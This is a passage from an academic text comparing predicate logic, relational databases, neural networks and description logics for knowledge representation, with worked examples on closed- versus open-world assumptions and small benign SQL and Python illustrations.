are known to be products are distributed in some y which is a market." This example introduces variables (x, y), which act as placeholders for elements of the domain, and quantifiers. Existential quantification (∃y) expresses the existence of at least one element of the domain that satisfies a constraint: "There is at least one y that is a market." Universal quantification (∀x) identifies a set of elements of the domain
that belong to one or more predicates, according to some properties: "All x that are products." Note also that we have found two types of predicates: unary ones (i.e., with one argument in parentheses), like Product(x) and Manufacturer(acme_corp), and binary ones (i.e., with two arguments in parentheses), like isDistributedIn(x, y). The former type denotes concepts, that is, sets of constants that share some characteristic, while the latter denotes roles, that is, relationships between two constants. Predicates with higher arity, that is, predicates expressing a relationship among three or more constants, are also possible. Hence, besides the connectives available in propositional logic (AND, OR, and NOT), predicate logic has a richer palette of operators for describing the entities populating a domain. As in propositional logic, there are some available reasoning services, which allow one to decide the truth of a formula or a set of formulæ. Before introducing reasoning services, it is necessary to define the semantics underlying predicate logic, which is based on the concept of interpretation. Intuitively, an interpretation is an assignment of {T, F} to each formula in a set of formulæ, or in a complex formula, that permits the evaluation of the whole (complex) formula. Moreover, the same complex formula should be understood in the same way by different people or automatic systems, avoiding misinterpretations. Formally, an interpretation I is defined as a pair I = (∆I, ·I), where ∆I is a non-empty set called domain and ·I is a function mapping:
• constants to elements of the domain: aI ∈ ∆I;
• n-ary predicate symbols to n-ary relations over the domain: PI ⊆ (∆I)n.
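As a concrete (and deliberately finite) rendering of these notions, the following sketch represents an interpretation as a Python structure: a domain, a mapping for constants, and extensions for the predicates of the running example; the domain elements and their arrangement are ours, chosen only for illustration.

# A finite interpretation: the domain plus the extensions assigned to
# constants, unary predicates (subsets of the domain) and binary predicates
# (subsets of domain x domain).
domain = {"acme_corp", "anvil", "italy"}
const = {"acme_corp": "acme_corp"}                # constants -> domain elements
Manufacturer    = {"acme_corp"}
Product         = {"anvil"}
Market          = {"italy"}
isDistributedIn = {("anvil", "italy")}

# Manufacturer(acme_corp) is true in this interpretation
print(const["acme_corp"] in Manufacturer)         # True

# Evaluate "forall x. Product(x) -> exists y. Market(y) and isDistributedIn(x, y)"
holds = all(
    any(y in Market and (x, y) in isDistributedIn for y in domain)
    for x in domain if x in Product
)
print(holds)                                      # True in this interpretation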
Introduction to Relational Databases

The relational model constitutes the theoretical background underlying RDBMS, representing
the most widely implemented technology for data storage and retrieval. The relational model was formalized by Edgar Codd in 1969; the interested reader may refer to a revised version of this work (Codd, 1990) for a thorough description of the model. In a nutshell, a relation is defined by a set of typed attributes and a set of attribute values, grouped as tuples that are consistent with the attribute types. According to the set-theoretic interpretation of the relational model, a relation can be seen as a subset of the Cartesian product of the domains indicated by the attributes; on the other hand, the relational model can be seen as a two-valued propositional logic (i.e., one whose variables evaluate to either true or false). Relations can be manipulated and combined by means of the set of operators constituting relational algebra. Basic operators are projection on the instance values of a subset of attributes (πa1,...,an) and selection of tuples on the basis of a condition (σc). As an example, in order to retrieve the name and price of products that are of type 'refrigerator,' we may write the following formula:

πname,price(σtype='refrigerator'(products))    (1)
The basic pool of operators is completed by the set operators union (∪), difference (\), and Cartesian product (×) of two relations, and by the rename operator (ρa1/a2), which is a necessary formal means to execute the Cartesian product on relations whose attribute names are not disjoint. This basic set can be used to define a large number of join operations, simplifying practical applications of relational algebra. Instead of relations and tuples, database administrators are more comfortable with terms like table and row; the difference is not purely lexical, because all RDBMS implementations diverge from the relational model in the operational semantics they convey. As an example, table attributes in RDBMS may evaluate to NULL, a special value which indicates missing information and is handled by the system differently from
traditional algebraic evaluation. Rather than relying on relational algebra, RDBMS adopt SQL (Structured Query Language) (Abiteboul, Hull, & Vianu, 1995) as the interface language for querying database instances. SQL also extends the capabilities of the language with commands for schema creation (e.g., for creating and modifying tables), data manipulation (e.g., inserting rows), access control (i.e., specifying access rights of users), and transaction control (i.e., defining sequences of operations that allow for compensation of failures through rollback). As an example, the formula in (1) can be translated into the following SQL statement:

SELECT name, price FROM products WHERE type = 'refrigerator';
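For readers who want to try the translation end to end, the following self-contained sketch uses Python's sqlite3 module with an invented products table; SQLite's dialect differs in minor details from the abstract SQL discussed here.

import sqlite3

# A toy 'products' table so the query above can be executed
# (table contents are invented for illustration).
con = sqlite3.connect(":memory:")
con.execute("CREATE TABLE products (name TEXT, price REAL, type TEXT)")
con.executemany("INSERT INTO products VALUES (?, ?, ?)", [
    ("CoolBox 100", 499.0, "refrigerator"),
    ("FreezeMaster", 699.0, "refrigerator"),
    ("Digital Watch", 59.0, "watch"),
])

# The SQL translation of formula (1): project name and price,
# select the tuples whose type is 'refrigerator'.
for row in con.execute("SELECT name, price FROM products WHERE type = 'refrigerator'"):
    print(row)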
Database system engineering also takes advantage of ER (Entity-Relationship) diagrams (Chen, 1976) for structuring data according to abstractions such as generalization and aggregation. Unfortunately, these constructs (as well as n-ary relations) may not be directly translated into a relational schema that can be expressed by RDBMS; instead, a preliminary phase in database implementation takes care of restructuring the input schema, so that it complies with a normal form that can be directly implemented by existing applications. In this work, we investigate the practical application semantics of knowledge base management; consequently, we draw concepts and terminology from SQL systems. Similarly, in evaluating the expressiveness that the different formalisms allow for, we will take into account the practical capabilities of implementations. As an example, the handling of generalization hierarchies is not considered a feature of RDBMS, because such hierarchies are flattened during normalization. For the purposes of this work, we think of a database as a structured pool of data. We do not go into the details of database theory, so we point the reader to (Abiteboul et al., 1995) for a comprehensive introduction to the topic.
A database relies on a schema, which describes the 'things' that are stored in the database. Among the different approaches to the structure of a schema, the most commonly known and commercially adopted is the relational schema, which allows one to define information in terms of multi-related records (tables). Alternative (but less used) approaches are the hierarchical model (e.g., the one used in LDAP), the network model (which permits multiple inheritance via lattice structures), the object-oriented model, and the XML-based model. The representational tool in relational databases is the table, which allows the representation of instances and of relations among instances. For example, a manufacturer can be represented as in Table 1, which is an abstraction of the database table defining the manufacturer concept in order to store instance data. The first row represents the schema of the table: the database table is named Manufacturer and has three attributes: name, address, and state. The second row represents a tuple in the table. A tuple is the generic name for an n-ary relation (i.e., the relation between the concept and its attributes, where n is the number of attributes) and represents in practice one line of a table. Table 1 describes a particular instance of manufacturer, whose name is 'Clocks Inc.' and whose office is on '5th Avenue' in the state of 'New York.' More formally, both a definition and an instance can
be expressed as a tuple. For example, the following is a tuple representing the manufacturer definition2:

Manufacturer: name, address, state

whereas the Clocks Inc. instance can be expressed as:

Manufacturer(Clocks Inc., 5th Avenue, New York)

In the definition of the concept, it is possible to specify the type of an attribute (e.g., integer, string, etc.) and whether it is mandatory or not. Attribute fillers (namely, column values) have to be of the declared type. For example, the address of a manufacturer has to be a string; the state has to be a string as well, or constrained to belong to a list, and so forth. A table can also express a relationship. Consider Table 2: the first row defines relation 'provides,' which can hold between a manufacturer and a product. Assuming 'Digital Watch' is an instance of product, the second row states the fact that the manufacturer named 'Clocks Inc.' provides the product named 'Digital Watch.'
Table 1. Definition of manufacturer

Manufacturer:  name        | address    | state
               Clocks Inc. | 5th Avenue | New York

Table 2. Definition and instantiation of relation 'provides.'

provides:  Manufacturer | Product
           Clocks Inc.  | Digital Watch
In the real world, in order to avoid the problems related to multiple tuples having the same value (say, 'Clocks Inc.') for a given attribute, tuples are univocally identified within a table by keys, that is, typically numeric attributes whose values are kept unique within a table instance. Relationships between tuples from distinct tables can then be expressed by referencing these attribute values as foreign keys. It is important to notice that Table 2 states a relation between two tuples, the 'Clocks Inc.' instance and the 'Digital Watch' instance. This simple database allows one to pose queries, for example, to retrieve all products of a given manufacturer, to retrieve all manufacturers in the state of New York, and so forth. The purpose of a relational database, especially in commercial applications, is fast querying, supported by views that are built during batch procedures. A view is a sort of virtual table containing tuples of some particular table column, with pointers to the rows associated with the values; it is usually built to quickly locate some tuples (rows) in a table. Views simply speed up retrieval; without them the application still works, just more slowly. Views can be built on any combination of attributes, usually the most frequently queried ones. We can distinguish three main actions that are performed on a database: schema construction, population, and querying. The first action is the definition of the tables and of the relations between them. During this phase some semantics is involved, especially during the establishment and statement of relations. For example, the definition of table 'provides' requires that the elements which populate it come from the manufacturer and the product tables. More formally, in set-theoretic terms, the pairs that populate the table have to be a subset of the Cartesian product obtained by coupling tuples of the manufacturer table and tuples of the product table. The same 'semantic requirement' applies in the subsequent phases, population and querying. Population is the construction of instances, that is, tuples describing the objects which populate the database. During population there is a sort of type check, to control the type-correctness of the tuples populating table 'provides.' The querying phase involves
also the specification of properties, which introduce additional semantic operations. For example, it is possible to retrieve all the manufacturers in the New York state. In other words, retrieval allows one to specify constraints on the values of the tuples to be searched in a specific table or in a set of tables.
OWA/CWA. The underlying assumption of RDBMS is that the world is closed. This means that, during the querying phase, if a table does not exist or is empty, the result is an empty set of tuples.
Static/Dynamic system. Relational databases are static systems. In this case, static means that, unlike in ANN approaches, there is no training phase required for the system to work. Once the schema has been declared and populated, the system is ready to be used.
Incomplete knowledge. The management of incomplete knowledge is not handled by RDBMS. A database must always be capable of retrieving the information that describes what one of its elements is, so it must have certainty about the data it stores and retrieves. It is important to notice that the main purpose of relational databases is fast querying of explicitly stated knowledge.
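The closed-world behaviour described above can be observed directly with Python's sqlite3 module; the tables and rows below mirror the running example and are otherwise invented.

import sqlite3

con = sqlite3.connect(":memory:")
con.execute("CREATE TABLE manufacturer (name TEXT PRIMARY KEY, state TEXT)")
con.execute("CREATE TABLE provides (manufacturer TEXT REFERENCES manufacturer(name), product TEXT)")
con.execute("INSERT INTO manufacturer VALUES ('Clocks Inc.', 'New York')")
con.execute("INSERT INTO provides VALUES ('Clocks Inc.', 'Digital Watch')")

# Query for providers of 'Anvil': no tuple matches, so the answer is the empty set --
# under the CWA this is read as "nobody provides anvils", not as "unknown".
rows = con.execute("SELECT manufacturer FROM provides WHERE product = 'Anvil'").fetchall()
print(rows)  # []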
INTRODUCTION TO ARTIFICIAL NEURAL NETWORKS

An ANN can be defined as a system of programs and data structures that approximates the operation of the human brain. ANNs involve a large number of processes operating in parallel, each with its own small "sphere of knowledge" and access to data in its local memory. The communication among physiological neurons is carried out through the exchange of neurotransmitters. These contribute to triggering the action potential and therefore determine whether neighboring neurons are activated. We can represent the operation of neurons by means of a logical structure, as McCulloch and Pitts already formalized back in 1943.
These kinds of neurons can be arranged in short temporal sequences. The response of the single output neuron represents the truth value of the binary logical operation represented over the input neurons. The weights and the thresholds are chosen so that, at every time step, a logical computation is carried out. This model of neural net allows the computation of propositional negation, conjunction (AND), and disjunction (OR). Using an identity function, a net of formal neurons computes the exclusive OR (XOR) of two propositions. The Perceptron of Rosenblatt (1962) is the natural extension of the formal neuron of McCulloch and Pitts. It estimates in parallel a variety of predicates on the input, and the weighted sum of their outputs is compared with a threshold. An appropriate choice of the interconnection weights and of the thresholds supplies the output for the correct classification of the input. Minsky and Papert (1969) pointed out that the Perceptron was limited in its classification capabilities: it cannot compute XOR unless hidden layers of units are introduced between the input and output layers. Minsky and Papert could not propose a learning
rule to deal with the hidden units. A number of people have since independently discovered the learning rule for a multi-layered Perceptron network. The first to discover the generalized delta rule, or back-propagation algorithm, was Werbos in 1974 (Werbos, 1994). Consequently, this particular neural network becomes a dynamic system with feedback, whose states can be seen as binary words of n bits. These states are evoked by classes of stimuli and so they become the representation of these classes. Every state of the net (the dynamic system) is an instantaneous snapshot of the system. A dynamic sequence of states of the net is a trajectory in an n-dimensional space whose vertices are the binary words representing the states of the net. Figure 1 shows how a generic neural network unit works. In Balkenius and Gärdenfors (1991), an artificial neural network N is defined as a 4-tuple ⟨S, F, C, G⟩. S is the space of all possible states of the neural network; the dimensionality of S corresponds to the number of parameters used to describe a state of the system. F is a set of state transition functions or activation functions.
Figure 1. A high-level view of a neural network unit: the potential P(t) is the weighted sum Σi wi xi(t) of the inputs, and the output u(t+1) is obtained through the sigmoid activation function 1/(1 + e−[P(t)−S]).
C is the set of possible configurations of the network. G is a set of learning functions that describe how the configurations develop as a result of various inputs to the network. Two interacting subsystems can be distinguished in a neural network: one that governs the fast changes in the network, that is, the transient neural activity, and one that controls the slower changes that correspond to the overall learning in the system. ANNs have a distributed representation of knowledge (Kurfess, 1999): an item is not represented by a single symbol or a sequence of symbols, but by the combination of many small representational entities, often referred to as microfeatures. We could say that a static schema is a stable pattern of activity in a neural network. A schema α corresponds to a vector <a1, ..., an> in the state space S. Saying that a schema α is currently represented in a neural network with an activity vector x = <x1, ..., xn> means that xi ≤ ai for all 1 ≤ i ≤ n. Let α, β be two schemata. If α ≤ β, then β can be considered a more general schema than α, and α can thus be seen as an instantiation of schema β. Semantics in ANN. According to Healy and Caudell (2006), concepts are symbolic descriptions of objects and events, observable or imagined, at any arbitrary level of generality or specificity. They are organized as a multi-threaded hierarchy ordered from the abstract to the specific. In this context, the semantics of a neural network can be expressed as an evolving representation of a distributed system of concepts, many of them learned from data via weight adaptation. To build a class we usually use definitions or constraints, which are conditions to be satisfied or, better, features and attributes of the classes themselves. Classes are composed of members representing a specific domain. ANNs create sub-symbolic class relations strongly related to the particular described domain. These kinds of relations are embedded into the structure of the dynamical system, and this dynamical system architecture is a model of the described and learned domain.
OWA/CWA. A clear distinction between the closed world assumption and the open world assumption is not so easy to draw in the field of ANN. The standard models of neural networks are usually closed world systems. We could evaluate the "openness" of a neural network by first considering its physical structure: for example, if we need a variable number of nodes, we can apply a pruning approach that removes redundant units from a network (Wynne-Jones, 1991). On the other hand, we can use a fixed structure but change the amount of information in the training set. An example about learning the past tenses of English verbs can be found in Rumelhart and McClelland (1986): a simple Perceptron-based pattern associator, interfaced with an input/output encoding/decoding network, allows the model to associate verb stems with their past tenses using a special phoneme-representation format. Static/dynamic system (learning and relational semantics). The process of learning modifies the structure of the weights in the neural network in order to maximize the number of constraints that are satisfied. In this way, ANNs capture the constraint structure of the particular modeled context, so we can say that the network has "learned" the relational semantics of that domain. This point of view shows that semantics is a kind of Gestalt that organizes data into a coherent structure. The understanding of meaning could consist of the emergence of coherence, starting from a chaotic initial state, through a phase transition. Balkenius and Gärdenfors (1991) have also shown that, by introducing an appropriate schema concept and exploiting the higher-level features of the resonance function in a neural network, it is possible to define a form of non-monotonic inference relation. So, "truth" in ANNs consists of the dynamic state in which a node is active or not, that is, the truth embedded in the knowledge state of the system. The particular dynamic system represented by a specific ANN structure is the model of the learned domain. Typically, a neural network is
initially "trained" with large amounts of data and rules about data relationships. One of the most important features of a neural network is its ability to adapt to new environments; therefore, learning algorithms are critical for the study of neural networks. Learning is essential to most of these neural network architectures, and hence the choice of the learning algorithm is a central issue in the development of an ANN. Learning implies that a processing unit can change its input/output behavior as a result of changes occurring in the environment. Since the activation functions are usually fixed when the network is constructed and the input/output vector cannot be changed, the weights corresponding to that input vector need to be adjusted in order to modify the input/output behavior. A method is thus needed, at least during a training stage, to modify the weights in response to the input/output process. A number of such learning functions are available for neural network models. Learning can be either supervised, in which the network is provided with the correct answer for the output during training, or unsupervised, in which no external teacher is present. MLP (Multilayer Perceptron) training algorithms are examples of supervised learning using EBP (Error Back-Propagation) (Rumelhart & McClelland, 1986). EBP is a gradient descent algorithm that uses input vectors and the corresponding output vectors to train a multiple layer network until it can approximate a given function. It has been proved that MLPs, which are networks with biases, a sigmoid layer, and a linear output layer, can approximate any function with a finite number of discontinuities. Kohonen's Self-Organising Maps (Kohonen, 2000) are based on unsupervised learning. The preservation of neighborhood relations is a very useful property that has attracted great interest: similar input patterns from the input space are projected onto neighboring nodes of the output map and, conversely,
nodes that are adjacent in the output map decode similar input patterns. All self-organizing networks have generally been considered as preserving the topology of the input space, as a consequence of competitive learning. However, according to recent definitions of topology preservation, not all self-organising models have this property. Incomplete knowledge. After learning, every input given to the ANN is classified, even if it was never seen before or has no evident relation with already present elements. So, incomplete knowledge cannot be discovered in ANNs. For example, if we want to build a suitable neural network model that represents the concept of "Monopoly" within our sample scenario, we can choose among different neural network architectures. We decided to use a Multilayer Perceptron (Figure 2) that models the relation among the different instances of Article, Product, Manufacturer, and so on. The learning algorithm of the MLP is represented by Equation (2), as presented in Rumelhart and McClelland (1986).
Δwij(t) = −η ∂E/∂wij + α Δwij(t − 1)    (2)
The minimum error (E) obtained during the training depends on a suitable learning rate (η) and momentum (α). Once the training is completed, it is necessary to test the network's effective ability to recognize the concept Monopoly. The training set is represented by all the instances of TargetMarket [Country code, Product Code, Manufacturer]. So, when we minimize the error on the training set associating TargetMarket with the typology of monopoly, we obtain a model of this kind of concept embedded in the Perceptron structure. Moreover, after the training phase, this model can associate a new instance of TargetMarket (never seen before) with one of the classes of Monopoly. In this way, a neural network is able to fill in missing information.
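The sketch below is not the two-layer network of Figure 2 but a single sigmoid unit trained by gradient descent with momentum, which is enough to show how a weight vector is adapted from a labelled training set along the lines of Equation (2); the feature encodings, labels, and hyperparameter values are invented for illustration.

import math, random

def sigmoid(p): return 1.0 / (1.0 + math.exp(-p))

# Toy training set: each instance is encoded as a numeric feature vector
# (encodings are invented) labelled 1 for "monopoly", 0 otherwise.
data = [([1.0, 0.0, 0.0], 1), ([0.0, 1.0, 1.0], 0), ([1.0, 1.0, 0.0], 1), ([0.0, 0.0, 1.0], 0)]

random.seed(0)
eta, alpha = 0.5, 0.8                       # learning rate and momentum, as in Equation (2)
w = [random.uniform(-0.5, 0.5) for _ in range(3)]
dw_prev = [0.0, 0.0, 0.0]

for epoch in range(2000):
    for x, target in data:
        y = sigmoid(sum(wi * xi for wi, xi in zip(w, x)))
        # dE/dw_i for the squared error of a sigmoid unit; the momentum term
        # keeps a fraction of the previous weight change.
        grad = [-(target - y) * y * (1 - y) * xi for xi in x]
        dw = [-eta * g + alpha * d for g, d in zip(grad, dw_prev)]
        w = [wi + di for wi, di in zip(w, dw)]
        dw_prev = dw

# Approximate outputs after training, close to the labels 1, 0, 1, 0
print([round(sigmoid(sum(wi * xi for wi, xi in zip(w, x))), 2) for x, _ in data])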
INTRODUCTION TO DESCRIPTION LOGICS
DLs are a family of languages for knowledge representation and reasoning. Technically, they are defined as a decidable fragment of First Order Logic (Kelly, 1997), restricted to unary and binary predicates. We briefly introduce here the basic concepts underlying DLs: components, syntax, semantics, and reasoning. We point the interested reader to the Description Logic Handbook (Baader, Calvanese, McGuinness, Nardi, & Patel-Schneider, 2003) or to the bibliography for a deeper presentation. Components of a DLS (Description Logic System). The three main components of a DLS are depicted in Figure 3. A KB is a set of assertions (also called statements or axioms) about a domain, defined by means of concepts (a.k.a. classes), roles (a.k.a. properties), and relationships; it can be described in DLs by means of a concept language. The axioms are written in a concept language and are organized in a TBox and an ABox, the former containing the described domain structure and the latter containing real objects. Reasoning services allow one to deduce additional information from the knowledge stored in the KB. It is worth noting that the very core of a DLS is its ability to correctly reason over the data contained in the knowledge base. Before describing the components of a DLS, we give an overview of concept languages. Concept languages. Like every language, a concept language consists of a syntax, which encompasses constructors that allow one to link elements or sets of elements in the domain. Concept languages allow one to write axioms (assertions over elements or sets of elements in the domain) to define concepts and roles (i.e., properties of concepts and relationships among concepts), which are aggregates of elements in the domain, and to make assertions about single elements (also called individuals or instances) of the domain. Concepts are defined by unary predicates and roles by binary predicates, and both can be either atomic or complex. Here are some examples.
1. TargetMarket ⊆ Market. "A target market is a particular type of market" or, more technically, "The set of all target markets is contained in the set of all markets."
2. Article ≡ Product ∩ ∃hasName ∩ ∃hasSalePrice. "An article is a kind of product, and it has a name and a sale price". Product is an atomic concept (i.e., it is not defined in terms of other concepts). Article is a complex concept; hasName and hasSalePrice are roles.
3. ∃isDistributedIn.Market, ∃isDistributedIn−.Article. This is more subtle, but it basically says "An article is sold in a market". It expresses explicitly the range (Market) and domain (Article) of role isDistributedIn, although one would better write it as Article ≡ ∃isDistributedIn.Market. The value after the '.' (e.g., in isDistributedIn.Market it would be Market) is called the filler of the property. The superscript − denotes the inverse property. The DL syntax indeed only allows one to specify the filler (i.e., the range) of a property, and not its domain.
4. Product(cell_phone). "Cell phone is a Product," or "Cell phone is an individual of type Product."
5. isDistributedIn(cell_phone, italy). "Cell phone is sold in Italy." Note the difference in the syntax between the definition of the role isDistributedIn above and its instantiation here.

Figure 2. A multilayer Perceptron modelling the concept "monopoly": an input layer (X1, X2, X3) connected through weights W1ij to a hidden layer (H1, H2), which is connected through weights W2ij to the output layer (O1).

Figure 3. The components of a description logic system: a knowledge base Σ, composed of a TBox and an ABox, and the reasoning services that produce the output.

TBox and ABox. The TBox contains the intensional knowledge, which is general knowledge concerning the domain of discourse, fixed in time and usually not subject to change. The TBox contains terminological axioms, that is, axioms that define concepts and roles, like in examples 1-3 above. The ABox contains the extensional knowledge, which concerns specific elements of the domain and might change over time. The ABox contains assertional axioms, that is, axioms that describe and represent assertions about individuals in the domain, like in examples 4-5 above. TBox and ABox form the KB, denoted by Σ = (T, A), where T is the TBox and A the ABox. Although knowledge bases and databases may seem very similar from a structural point of view, with the tables of a RDBMS resembling the TBox and the tuples of each table resembling the actual data contained in the ABox, there are a lot of differences from a conceptual point of view that we will show with the following example.3
T = { Article ≡ Product ∩ ∃isProducedBy.Company ∩ ∃hasName ∩ ∃hasSalePrice ∩ ≥1 isDistributedIn.TargetMarket,
Product ≡ ∃isProducedBy.Manufacturer ∩ ≥1 isReselledBy.Reseller ∩ ≥1 isDistributedBy.Distributor ∩ ≥1 isDistributedIn.Market,
Market ⊆ Country,
TargetMarket ≡ Market ∩ ∃hasCurrency,
Consumer ≡ ∃buys.Article,
Company ≡ ∃provides }

A = { provides(acme_corp, anvil), provides(acme_corp, rockets), provides(logistics_inc, transportation), Manufacturer(clocks_inc), Supplier(logistics_inc), buys(will, anvil), buys(lisa, toaster), buys(pauline, digital_watch), buys(john, chronograph) }

A KB also contains the so-called "implicit knowledge," information not explicitly stated but that can be logically deduced from the existing knowledge. Implicit knowledge can be discovered with the help of reasoning services, for example in the answer to a query posed by a user to the system. A reasoning engine (called a reasoner) also provides additional inference services: depending on the input and on the goal, the system carries out different processes. Hence, it is immediately seen that, unlike in RDBMS, it is not necessary to state explicitly either that anvil, toaster, digital watch, and chronograph are articles, or that Will, Lisa, Pauline, and John are consumers, since these conclusions are automatically derived from the definition Consumer ≡ ∃buys.Article ("A consumer is someone who buys an article"): since the filler of role buys is Article, every second argument of the relation buys is automatically derived to be an element of the set Article. The same applies to Consumer: since it is defined as someone who buys an article, every first argument in the relation is derived to be an element of the set Consumer. Note also
the difference in the definition of Consumer and Company: they are both valid, but the former represents someone who buys an article, whereas the latter represents an entity that provides something. This makes it impossible to derive additional information on the filler of role provides: we know that a company provides something, but we do not know what. We might discover subsequently that a company provides Goods, so we can modify the actual axiom in our knowledge base to Company ≡ ∃provides.Good. Semantics of DL Languages. We will denote with ∆ the domain of discourse, with × the Cartesian product of two generic sets, and with ⊆ the subsumption relation (i.e., the relation between super- and subclasses) between Concepts or Roles. The semantics of DL languages is given in terms of an interpretation, defined as a pair I = (∆I, ·I), where ∆I is a non-empty set called domain and the interpretation function ·I is a mapping from every Concept to a subset of ∆I, from every Role to a subset of ∆I × ∆I, and from every Individual to an element of ∆I. An interpretation I is a model for a Concept C if the set CI is non-empty. Besides those presented at the beginning of this section, DLs provide many additional connectives, also called constructors, each of which has its own semantics, so that it can be uniquely interpreted. The basic constructors AND, OR, and NOT have the same interpretation as in predicate logic: the conjunction of two or more concepts (i.e., concepts related by AND) evaluates to true if and only if all the concepts are true, and similar arguments apply to disjunction (OR) and negation (NOT). Additional constructors provided by DLs include inverse roles, (qualified) number restrictions, and functionality. Inverse roles are roles with their arguments swapped, for example producedBy (as in "A product is produced by a manufacturer") and produces ("A manufacturer produces a product"). Number restrictions allow one to specify how many values of a particular role can be specified for a concept; this is also called a
cardinality restriction, and it can be specified as an exact restriction, an at-least restriction, or an at-most restriction, meaning that the number of allowed values must be exactly, at least, or at most equal to the given one.
• A national article is distributed in exactly one target market: NationalArticle ≡ =1 isDistributedIn.TargetMarket
• An article is distributed in at least ten target markets: Article ≡ ≥10 isDistributedIn.TargetMarket
• An exclusive article is distributed in at most three target markets: ExclusiveArticle ≡ ≤3 isDistributedIn.TargetMarket
Functionality is a particular characteristic of a role that allows one to uniquely identify the filler for that role when describing a given individual. Formally, given a functional role R and individuals x, y, z, if R(x, y) ∧ R(x, z), it follows necessarily that y = z. For example, you may want to constrain each company to have only one CEO (Chief Executive Officer), so that whenever you talk about this company, its CEO is uniquely identified. Now, suppose that role hasCEO is functional, and you have the following axioms:

hasCEO(acme_corp, john_smith)
hasCEO(acme_corp, john_h_smith)

There are two possible ways to read these two axioms: either John Smith and John H. Smith are the same person, or your knowledge base is inconsistent, since functionality forbids that ACME Corp. (and every other company) has more than one CEO. Reasoning. A DL system provides many basic inference services. Here we present some of them, and we sketch out how they are used to build some
more complex ones.
1. Subsumption: decide whether a concept is more general than another. Upon Subsumption, the process of Classification is built, that is, the process that builds the hierarchy of the concepts in the TBox T.
2. Consistency Check: decide whether Σ is satisfiable, that is, whether it is coherent and admits a model.
3. Concept Satisfiability: decide whether a concept C is satisfiable in a KB Σ.
4. Instance Checking: decide whether an instance C(a) is satisfied in every model of Σ. On Instance Checking is based the process of Retrieval or Query Answering: given a KB Σ and a concept C, find the set of all instances C(a) in Σ.
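Real DL reasoners decide subsumption with tableaux or resolution-based calculi; the toy sketch below only covers concepts that are plain conjunctions of atomic names, but it conveys what the Subsumption and Classification services compute.

# A deliberately tiny subsumption check: a concept is modelled as the set of
# its atomic conjuncts, so C is subsumed by D when D's conjuncts are among C's.
def subsumed_by(c, d):
    return d <= c

Article = {"Product", "hasName", "hasSalePrice"}   # Article = Product and hasName and hasSalePrice (simplified)
Product = {"Product"}

print(subsumed_by(Article, Product))   # True: every Article is a Product
print(subsumed_by(Product, Article))   # False: not every Product is an Article

# Classification then amounts to computing this relation for every pair of
# named concepts in the TBox and arranging the results into a hierarchy.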
Static and dynamic systems. We have already noted that a KB stores two types of knowledge: intensional and extensional. The former is also said to be timeless, since it is unlikely to be changed. DLs and KBs are indeed suitable for describing domains that can evolve over time, but only at the ABox level, that is, in the assertions on individuals and not in the structure stored in the TBox: the TBox is designed in such a way that it can hardly be changed. Description Logic Systems are therefore static systems: they cannot automatically update the TBox, as this implies the redefinition of an existing concept (see (De Giacomo, Lenzerini, Poggi, & Rosati, 2006)); only the intervention of the user can modify a concept. Note also that the literature about updates w.r.t. the ABox is very limited (investigated in (Liu, Lutz, Milicic, & Wolter, 2006)), and ontology evolution (i.e., ontology update w.r.t. the TBox) is almost uninvestigated (an exception is (Haase & Stojanovic, 2005)). Management of incomplete knowledge. We have already seen that in a RDBMS what is not explicitly stated in a table is considered false: true is only the knowledge carried by the tuples. For example, if there is no tuple in a table that
states "ACME Corp. is a supplier," then no query for suppliers to the RDBMS will return ACME Corp. as a result. This is what is called the Closed World Assumption. In KBs, however, the answer to the same query might have a result, as it could be inferred from other statements that ACME Corp. is in fact a supplier. The following statements can, in fact, do the job: "A supplier provides manufactured goods" and "ACME Corp. provides anvils". From them we can infer that ACME Corp. is a supplier, and that anvils are a type of manufactured goods. Another difference between KBs and RDBMS is in the management of incomplete knowledge about a domain. To understand what is meant by incomplete knowledge, suppose that in our database we already have three tables: Supplier, Manufacturer, and Reseller. Consider the following example, composed of two statements: ACME Corp. is not a reseller. ACME Corp. is a supplier or a manufacturer. These statements clearly define ACME Corp. as being either a supplier or a manufacturer, but not a reseller; however, it is not straightforward to represent this in our RDBMS. We cannot insert a tuple in any of the three tables of our database: we have to deal with information that does not exhaustively specify what ACME Corp. actually is, whereas inserting a tuple would require defining exactly what ACME Corp. is. It is possible to represent that ACME Corp. is not a reseller, for example by creating a NotReseller table, with appropriate foreign keys and constraints that check that an element of this table does not appear in the Reseller table. Representing the fact that ACME Corp. is either a supplier or a manufacturer is more complicated, and an exact representation might be impossible. However, statements like these are common in knowledge representation and the ability to deal with them is substantial: one should be able to express what an individual in the domain is not,
rather than explicitly tell what it is. Hence, in a DL that allows for negation and disjunction, the two statements can easily be represented as:

¬Reseller(acme_corp)
Supplier(acme_corp) ∨ Manufacturer(acme_corp)

In a Description Logic that has no support for negation or disjunction,4 the two statements cannot be represented either. Open and Closed World Assumption. The Closed World Assumption and the Open World Assumption represent two different approaches to evaluating knowledge in a knowledge base. The difference in their behaviour is usually clarified by a comparison between the structure of a KB Σ = (T, A) and a relational database, where the schema of the latter (i.e., its tables and structure) roughly corresponds to T and its tuples correspond to A. The difference is that, on the one side, we have a single RDBMS instance, which represents the only possible interpretation of the stored data, while on the other we have one out of all the possible interpretations of Σ. Hence, while in a RDBMS information that is not explicitly stated in a tuple is interpreted as "negative" or false knowledge, in a knowledge base it is considered false only if it contradicts some other axioms in the domain. The difference between the two behaviours is better seen with the help of an example. An example of OWA and incomplete knowledge. Suppose you want to model a very simple scenario, where companies are either manufacturers or suppliers, but not both, and nothing else can be a company. This situation is formalised in Description Logics with the formulæ:

T = { Company ≡ (Manufacturer ∪ Supplier), Manufacturer ∩ Supplier ⊆ ⊥ }

At first glance, it might seem straightforward to represent the same scenario in a RDBMS, for example with a table Company with two columns,
one with the name of the company and one that shows whether it is a manufacturer or a supplier with an appropriate flag. This table can be created with a SQL statement:

CREATE TABLE Company (
  name String NOT NULL PRIMARY KEY,
  type ENUM ('Manufacturer', 'Supplier') NOT NULL)

Even when we start populating both the KB and the RDBMS with the same complete data, for example with the information that ACME Corp. is a Manufacturer, everything seems correct. The ABox of the KB will contain an axiom and the RDBMS table will contain a tuple:

A = {Manufacturer(acme_corp)}

Company:  name       | type
          ACME Corp. | Manufacturer
However, a prominent difference becomes apparent when we want to represent in both the KB and the RDBMS some particular kinds of data. For example, suppose we know that ACME Corp. is a company, but we do not know whether it is a manufacturer or a supplier. In the KB, we need only add to the ABox the statement Company(acme_corp), but when we want to insert that information in the database, the lack of knowledge about ACME Corp. being a manufacturer or a supplier prevents the tuple from being inserted in the table, since the mandatory attribute type (either 'Manufacturer' or 'Supplier') is missing.
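The behaviour can be reproduced with Python's sqlite3 module; since SQLite has no ENUM type, a CHECK constraint stands in for it in this sketch, and the second company name is invented.

import sqlite3

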